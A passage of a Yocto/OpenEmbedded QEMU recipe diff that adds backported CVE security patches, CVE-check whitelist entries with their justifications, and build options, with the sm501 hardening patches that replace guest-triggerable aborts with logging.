+           file://CVE-2021-3416_6.patch \
+           file://CVE-2021-3416_7.patch \
+           file://CVE-2021-3416_8.patch \
+           file://CVE-2021-3416_9.patch \
+           file://CVE-2021-3416_10.patch \
+           file://CVE-2021-20257.patch \
+           file://CVE-2021-3544.patch \
+           file://CVE-2021-3544_2.patch \
+           file://CVE-2021-3544_3.patch \
+           file://CVE-2021-3544_4.patch \
+           file://CVE-2021-3544_5.patch \
+           file://CVE-2021-3545.patch \
+           file://CVE-2021-3546.patch \
+           file://CVE-2021-3527-1.patch \
+           file://CVE-2021-3527-2.patch \
+           file://CVE-2021-3582.patch \
+           file://CVE-2021-3607.patch \
+           file://CVE-2021-3608.patch \
+           file://CVE-2020-12829_1.patch \
+           file://CVE-2020-12829_2.patch \
+           file://CVE-2020-12829_3.patch \
+           file://CVE-2020-12829_4.patch \
+           file://CVE-2020-12829_5.patch \
+           file://CVE-2020-27617.patch \
+           file://CVE-2020-28916.patch \
+           file://CVE-2021-3682.patch \
+           file://CVE-2020-13253_1.patch \
+           file://CVE-2020-13253_2.patch \
+           file://CVE-2020-13253_3.patch \
+           file://CVE-2020-13253_4.patch \
+           file://CVE-2020-13253_5.patch \
+           file://CVE-2020-13791.patch \
+           file://CVE-2022-35414.patch \
+           file://CVE-2020-27821.patch \
+           file://CVE-2020-13754-1.patch \
+           file://CVE-2020-13754-2.patch \
+           file://CVE-2020-13754-3.patch \
+           file://CVE-2020-13754-4.patch \
+           file://CVE-2021-3713.patch \
+           file://CVE-2021-3748.patch \
+           file://CVE-2021-3930.patch \
+           file://CVE-2021-4206.patch \
+           file://CVE-2021-4207.patch \
+           file://CVE-2022-0216-1.patch \
+           file://CVE-2022-0216-2.patch \
+           file://CVE-2021-3750.patch \
+           file://CVE-2021-3638.patch \
+           file://CVE-2021-20196.patch \
+           file://CVE-2021-3507.patch \
+           file://hw-block-nvme-refactor-nvme_addr_read.patch \
+           file://hw-block-nvme-handle-dma-errors.patch \
+           file://CVE-2021-3929.patch \
+           file://CVE-2022-4144.patch \
+           file://CVE-2020-15859.patch \
+           file://CVE-2020-15469-1.patch \
+           file://CVE-2020-15469-2.patch \
+           file://CVE-2020-15469-3.patch \
+           file://CVE-2020-15469-4.patch \
+           file://CVE-2020-15469-5.patch \
+           file://CVE-2020-15469-6.patch \
+           file://CVE-2020-15469-7.patch \
+           file://CVE-2020-15469-8.patch \
+           file://CVE-2020-35504.patch \
+           file://CVE-2020-35505.patch \
+           file://CVE-2022-26354.patch \
+           file://CVE-2021-3409-1.patch \
+           file://CVE-2021-3409-2.patch \
+           file://CVE-2021-3409-3.patch \
+           file://CVE-2021-3409-4.patch \
+           file://CVE-2021-3409-5.patch \
+           file://hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch \
+           file://CVE-2023-0330.patch \
+           file://CVE-2023-3354.patch \
+	   file://CVE-2023-3180.patch \
+           file://CVE-2020-24165.patch \
+           file://CVE-2023-5088.patch \
+           file://9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch \
+           file://CVE-2023-2861.patch \
+           "
 UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
 
 SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a"
 SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0"
 
+# Applies against virglrender < 0.6.0 and not qemu itself
+CVE_CHECK_WHITELIST += "CVE-2017-5957"
+
+# The VNC server can expose host files uder some circumstances. We don't
+# enable it by default.
+CVE_CHECK_WHITELIST += "CVE-2007-0998"
+
+# 'The issues identified by this CVE were determined to not constitute a vulnerability.'
+# https://bugzilla.redhat.com/show_bug.cgi?id=1609015#c11
+CVE_CHECK_WHITELIST += "CVE-2018-18438"
+
+# the issue introduced in v5.1.0-rc0
+CVE_CHECK_WHITELIST += "CVE-2020-27661"
+
+# As per https://nvd.nist.gov/vuln/detail/CVE-2023-0664
+# https://bugzilla.redhat.com/show_bug.cgi?id=2167423
+# this bug related to windows specific.
+CVE_CHECK_WHITELIST += "CVE-2023-0664"
+
+# As per https://bugzilla.redhat.com/show_bug.cgi?id=2203387
+# RHEL specific issue
+CVE_CHECK_WHITELIST += "CVE-2023-2680"
+
+# Affected only `qemu-kvm` shipped with Red Hat Enterprise Linux 8.3 release.
+CVE_CHECK_WHITELIST += "CVE-2021-20295"
+
 COMPATIBLE_HOST_mipsarchn32 = "null"
 COMPATIBLE_HOST_mipsarchn64 = "null"
 
@@ -195,6 +314,16 @@ PACKAGECONFIG[glusterfs] = "--enable-glusterfs,--disable-glusterfs"
 PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon"
 PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev"
 PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2"
+PACKAGECONFIG[seccomp] = "--enable-seccomp,--disable-seccomp,libseccomp"
+PACKAGECONFIG[capstone] = "--enable-capstone,--disable-capstone"
+# libnfs is currently provided by meta-kodi
+PACKAGECONFIG[libnfs] = "--enable-libnfs,--disable-libnfs,libnfs"
+PACKAGECONFIG[brlapi] = "--enable-brlapi,--disable-brlapi"
+PACKAGECONFIG[vde] = "--enable-vde,--disable-vde"
+# version 4.2.0 doesn't have an "internal" option for enable-slirp, so use "git" which uses the same configure code path
+PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"
+PACKAGECONFIG[rbd] = "--enable-rbd,--disable-rbd"
+PACKAGECONFIG[rdma] = "--enable-rdma,--disable-rdma"
 
 INSANE_SKIP_${PN} = "arch"
 
diff --git a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
index 3a7d7bbd33..3789f1edea 100644
--- a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
+++ b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
@@ -60,7 +60,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
  1 file changed, 5 insertions(+), 2 deletions(-)
 
 diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
-index 6f132c5f..8329950c 100644
+index 300c9765..2823db7d 100644
 --- a/fsdev/virtfs-proxy-helper.c
 +++ b/fsdev/virtfs-proxy-helper.c
 @@ -13,7 +13,6 @@
@@ -71,9 +71,9 @@ index 6f132c5f..8329950c 100644
  #include <sys/fsuid.h>
  #include <sys/vfs.h>
  #include <sys/ioctl.h>
-@@ -27,7 +26,11 @@
- #include "9p-iov-marshal.h"
+@@ -28,7 +27,11 @@
  #include "hw/9pfs/9p-proxy.h"
+ #include "hw/9pfs/9p-util.h"
  #include "fsdev/9p-iov-marshal.h"
 -
 +/*
@@ -84,3 +84,6 @@ index 6f132c5f..8329950c 100644
  #define PROGNAME "virtfs-proxy-helper"
  
  #ifndef XFS_SUPER_MAGIC
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
new file mode 100644
index 0000000000..741a4fce0e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
@@ -0,0 +1,48 @@
+From 00b5032eaddb7193f03f0a28b10286244d2e2a7b Mon Sep 17 00:00:00 2001
+From: Carlos Santos <casantos@redhat.com>
+Date: Thu, 17 Oct 2019 09:37:13 -0300
+Subject: [PATCH 1/1] util/cacheinfo: fix crash when compiling with uClibc
+
+uClibc defines _SC_LEVEL1_ICACHE_LINESIZE and _SC_LEVEL1_DCACHE_LINESIZE
+but the corresponding sysconf calls returns -1, which is a valid result,
+meaning that the limit is indeterminate.
+
+Handle this situation using the fallback values instead of crashing due
+to an assertion failure.
+
+Signed-off-by: Carlos Santos <casantos@redhat.com>
+Message-Id: <20191017123713.30192-1-casantos@redhat.com>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+
+Upstream-status: Backport
+Signed-off-by: Andrei Gherzan <andrei.gherzan@huawei.com>
+---
+ util/cacheinfo.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/util/cacheinfo.c b/util/cacheinfo.c
+index ea6f3e99bf..d94dc6adc8 100644
+--- a/util/cacheinfo.c
++++ b/util/cacheinfo.c
+@@ -93,10 +93,16 @@ static void sys_cache_info(int *isize, int *dsize)
+ static void sys_cache_info(int *isize, int *dsize)
+ {
+ # ifdef _SC_LEVEL1_ICACHE_LINESIZE
+-    *isize = sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++    int tmp_isize = (int) sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++    if (tmp_isize > 0) {
++        *isize = tmp_isize;
++    }
+ # endif
+ # ifdef _SC_LEVEL1_DCACHE_LINESIZE
+-    *dsize = sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++    int tmp_dsize = (int) sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++    if (tmp_dsize > 0) {
++        *dsize = tmp_dsize;
++    }
+ # endif
+ }
+ #endif /* sys_cache_info */
+-- 
+2.30.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
new file mode 100644
index 0000000000..72d9c47bde
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
@@ -0,0 +1,63 @@
+From a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b Mon Sep 17 00:00:00 2001
+From: Omar Sandoval <osandov@fb.com>
+Date: Thu, 14 May 2020 08:06:43 +0200
+Subject: [PATCH] 9pfs: local: ignore O_NOATIME if we don't have permissions
+
+QEMU's local 9pfs server passes through O_NOATIME from the client. If
+the QEMU process doesn't have permissions to use O_NOATIME (namely, it
+does not own the file nor have the CAP_FOWNER capability), the open will
+fail. This causes issues when from the client's point of view, it
+believes it has permissions to use O_NOATIME (e.g., a process running as
+root in the virtual machine). Additionally, overlayfs on Linux opens
+files on the lower layer using O_NOATIME, so in this case a 9pfs mount
+can't be used as a lower layer for overlayfs (cf.
+https://github.com/osandov/drgn/blob/dabfe1971951701da13863dbe6d8a1d172ad9650/vmtest/onoatimehack.c
+and https://github.com/NixOS/nixpkgs/issues/54509).
+
+Luckily, O_NOATIME is effectively a hint, and is often ignored by, e.g.,
+network filesystems. open(2) notes that O_NOATIME "may not be effective
+on all filesystems. One example is NFS, where the server maintains the
+access time." This means that we can honor it when possible but fall
+back to ignoring it.
+
+Acked-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Signed-off-by: Omar Sandoval <osandov@fb.com>
+Message-Id: <e9bee604e8df528584693a4ec474ded6295ce8ad.1587149256.git.osandov@fb.com>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b]
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/9pfs/9p-util.h | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 79ed6b233e5..546f46dc7dc 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -37,9 +37,22 @@ static inline int openat_file(int dirfd, const char *name, int flags,
+ {
+     int fd, serrno, ret;
+ 
++again:
+     fd = openat(dirfd, name, flags | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK,
+                 mode);
+     if (fd == -1) {
++        if (errno == EPERM && (flags & O_NOATIME)) {
++            /*
++             * The client passed O_NOATIME but we lack permissions to honor it.
++             * Rather than failing the open, fall back without O_NOATIME. This
++             * doesn't break the semantics on the client side, as the Linux
++             * open(2) man page notes that O_NOATIME "may not be effective on
++             * all filesystems". In particular, NFS and other network
++             * filesystems ignore it entirely.
++             */
++            flags &= ~O_NOATIME;
++            goto again;
++        }
+         return -1;
+     }
+ 
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
new file mode 100644
index 0000000000..6fee4f640d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
@@ -0,0 +1,164 @@
+From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some places already use qemu_log_mask() to log unimplemented features
+or errors but some others have printf() then abort(). Convert these to
+qemu_log_mask() and avoid aborting to prevent guests to easily cause
+denial of service.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------
+ 1 file changed, 27 insertions(+), 30 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index acc692531a..bd3ccfe311 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s)
+     int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+ 
+     if (addressing != 0x0) {
+-        printf("%s: only XY addressing is supported.\n", __func__);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
++        return;
+     }
+ 
+     if (rop_mode == 0) {
+@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s)
+ 
+     if ((s->twoD_source_base & 0x08000000) ||
+         (s->twoD_destination_base & 0x08000000)) {
+-        printf("%s: only local memory is supported.\n", __func__);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
++        return;
+     }
+ 
+     switch (operation) {
+@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s)
+         break;
+ 
+     default:
+-        printf("non-implemented SM501 2D operation. %d\n", operation);
+-        abort();
+-        break;
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
++                      operation);
++        return;
+     }
+ 
+     if (dst_base >= get_fb_addr(s, crt) &&
+@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr,
+         break;
+ 
+     default:
+-        printf("sm501 system config : not implemented register read."
+-               " addr=%x\n", (int)addr);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++                      "register read. addr=%" HWADDR_PRIx "\n", addr);
+     }
+ 
+     return ret;
+@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr,
+         break;
+     case SM501_ENDIAN_CONTROL:
+         if (value & 0x00000001) {
+-            printf("sm501 system config : big endian mode not implemented.\n");
+-            abort();
++            qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not"
++                          " implemented.\n");
+         }
+         break;
+ 
+     default:
+-        printf("sm501 system config : not implemented register write."
+-               " addr=%x, val=%x\n", (int)addr, (uint32_t)value);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++                      "register write. addr=%" HWADDR_PRIx
++                      ", val=%" PRIx64 "\n", addr, value);
+     }
+ }
+ 
+@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr,
+         break;
+ 
+     default:
+-        printf("sm501 disp ctrl : not implemented register read."
+-               " addr=%x\n", (int)addr);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++                      "read. addr=%" HWADDR_PRIx "\n", addr);
+     }
+ 
+     return ret;
+@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr,
+         break;
+ 
+     default:
+-        printf("sm501 disp ctrl : not implemented register write."
+-               " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++                      "write. addr=%" HWADDR_PRIx
++                      ", val=%" PRIx64 "\n", addr, value);
+     }
+ }
+ 
+@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr,
+         ret = 0; /* Should return interrupt status */
+         break;
+     default:
+-        printf("sm501 disp ctrl : not implemented register read."
+-               " addr=%x\n", (int)addr);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++                      "read. addr=%" HWADDR_PRIx "\n", addr);
+     }
+ 
+     return ret;
+@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr,
+         /* ignored, writing 0 should clear interrupt status */
+         break;
+     default:
+-        printf("sm501 2d engine : not implemented register write."
+-               " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+-        abort();
++        qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register "
++                      "write. addr=%" HWADDR_PRIx
++                      ", val=%" PRIx64 "\n", addr, value);
+     }
+ }
+ 
+@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque)
+         draw_line = draw_line32_funcs[dst_depth_index];
+         break;
+     default:
+-        printf("sm501 update display : invalid control register value.\n");
+-        abort();
+-        break;
++        qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display"
++                      "invalid control register value.\n");
++        return;
+     }
+ 
+     /* set up to draw hardware cursor */
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
new file mode 100644
index 0000000000..e7258a43d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
@@ -0,0 +1,139 @@
+From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation
+
+This increases readability and cleans up some confusing naming.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 45 ++++++++++++++++++++++-----------------------
+ 1 file changed, 22 insertions(+), 23 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index bd3ccfe311..f42d05e1e4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+ static void sm501_2d_operation(SM501State *s)
+ {
+     /* obtain operation parameters */
+-    int operation = (s->twoD_control >> 16) & 0x1f;
++    int cmd = (s->twoD_control >> 16) & 0x1F;
+     int rtl = s->twoD_control & 0x8000000;
+     int src_x = (s->twoD_source >> 16) & 0x01FFF;
+     int src_y = s->twoD_source & 0xFFFF;
+     int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+     int dst_y = s->twoD_destination & 0xFFFF;
+-    int operation_width = (s->twoD_dimension >> 16) & 0x1FFF;
+-    int operation_height = s->twoD_dimension & 0xFFFF;
++    int width = (s->twoD_dimension >> 16) & 0x1FFF;
++    int height = s->twoD_dimension & 0xFFFF;
+     uint32_t color = s->twoD_foreground;
+-    int format_flags = (s->twoD_stretch >> 20) & 0x3;
+-    int addressing = (s->twoD_stretch >> 16) & 0xF;
++    int format = (s->twoD_stretch >> 20) & 0x3;
+     int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+     /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+     int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s)
+     /* get frame buffer info */
+     uint8_t *src = s->local_mem + src_base;
+     uint8_t *dst = s->local_mem + dst_base;
+-    int src_width = s->twoD_pitch & 0x1FFF;
+-    int dst_width = (s->twoD_pitch >> 16) & 0x1FFF;
++    int src_pitch = s->twoD_pitch & 0x1FFF;
++    int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+     int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+     int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+ 
+-    if (addressing != 0x0) {
++    if ((s->twoD_stretch >> 16) & 0xF) {
+         qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
+         return;
+     }
+@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s)
+         return;
+     }
+ 
+-    switch (operation) {
++    switch (cmd) {
+     case 0x00: /* copy area */
+ #define COPY_AREA(_bpp, _pixel_type, rtl) {                                   \
+         int y, x, index_d, index_s;                                           \
+-        for (y = 0; y < operation_height; y++) {                              \
+-            for (x = 0; x < operation_width; x++) {                           \
++        for (y = 0; y < height; y++) {                              \
++            for (x = 0; x < width; x++) {                           \
+                 _pixel_type val;                                              \
+                                                                               \
+                 if (rtl) {                                                    \
+-                    index_s = ((src_y - y) * src_width + src_x - x) * _bpp;   \
+-                    index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp;   \
++                    index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp;   \
++                    index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp;   \
+                 } else {                                                      \
+-                    index_s = ((src_y + y) * src_width + src_x + x) * _bpp;   \
+-                    index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp;   \
++                    index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp;   \
++                    index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp;   \
+                 }                                                             \
+                 if (rop_mode == 1 && rop == 5) {                              \
+                     /* Invert dest */                                         \
+@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s)
+             }                                                                 \
+         }                                                                     \
+     }
+-        switch (format_flags) {
++        switch (format) {
+         case 0:
+             COPY_AREA(1, uint8_t, rtl);
+             break;
+@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s)
+     case 0x01: /* fill rectangle */
+ #define FILL_RECT(_bpp, _pixel_type) {                                      \
+         int y, x;                                                           \
+-        for (y = 0; y < operation_height; y++) {                            \
+-            for (x = 0; x < operation_width; x++) {                         \
+-                int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp;   \
++        for (y = 0; y < height; y++) {                            \
++            for (x = 0; x < width; x++) {                         \
++                int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp;   \
+                 *(_pixel_type *)&dst[index] = (_pixel_type)color;           \
+             }                                                               \
+         }                                                                   \
+     }
+ 
+-        switch (format_flags) {
++        switch (format) {
+         case 0:
+             FILL_RECT(1, uint8_t);
+             break;
+@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s)
+ 
+     default:
+         qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+-                      operation);
++                      cmd);
+         return;
+     }
+ 
+     if (dst_base >= get_fb_addr(s, crt) &&
+         dst_base <= get_fb_addr(s, crt) + fb_len) {
+-        int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width +
+-                           dst_x + operation_width) * (1 << format_flags));
++        int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch +
++                          dst_x + width) * (1 << format));
+         if (dst_len) {
+             memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len);
+         }
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
new file mode 100644
index 0000000000..c647028cfe
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
@@ -0,0 +1,47 @@
+From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#3
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index f42d05e1e4..97660090bb 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s)
+ {
+     /* obtain operation parameters */
+     int cmd = (s->twoD_control >> 16) & 0x1F;
+-    int rtl = s->twoD_control & 0x8000000;
++    int rtl = s->twoD_control & BIT(27);
+     int src_x = (s->twoD_source >> 16) & 0x01FFF;
+     int src_y = s->twoD_source & 0xFFFF;
+     int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s)
+         }
+     }
+ 
+-    if ((s->twoD_source_base & 0x08000000) ||
+-        (s->twoD_destination_base & 0x08000000)) {
++    if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+         qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+         return;
+     }
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
new file mode 100644
index 0000000000..485af05e1e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
@@ -0,0 +1,100 @@
+From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Make variables local to the block they are used in to make it clearer
+which operation they are needed for.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index 97660090bb..5ed57703d8 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -699,28 +699,19 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+ 
+ static void sm501_2d_operation(SM501State *s)
+ {
+-    /* obtain operation parameters */
+     int cmd = (s->twoD_control >> 16) & 0x1F;
+     int rtl = s->twoD_control & BIT(27);
+-    int src_x = (s->twoD_source >> 16) & 0x01FFF;
+-    int src_y = s->twoD_source & 0xFFFF;
+-    int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+-    int dst_y = s->twoD_destination & 0xFFFF;
+-    int width = (s->twoD_dimension >> 16) & 0x1FFF;
+-    int height = s->twoD_dimension & 0xFFFF;
+-    uint32_t color = s->twoD_foreground;
+     int format = (s->twoD_stretch >> 20) & 0x3;
+     int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+     /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+     int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+     int rop = s->twoD_control & 0xFF;
+-    uint32_t src_base = s->twoD_source_base & 0x03FFFFFF;
++    int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
++    int dst_y = s->twoD_destination & 0xFFFF;
++    int width = (s->twoD_dimension >> 16) & 0x1FFF;
++    int height = s->twoD_dimension & 0xFFFF;
+     uint32_t dst_base = s->twoD_destination_base & 0x03FFFFFF;
+-
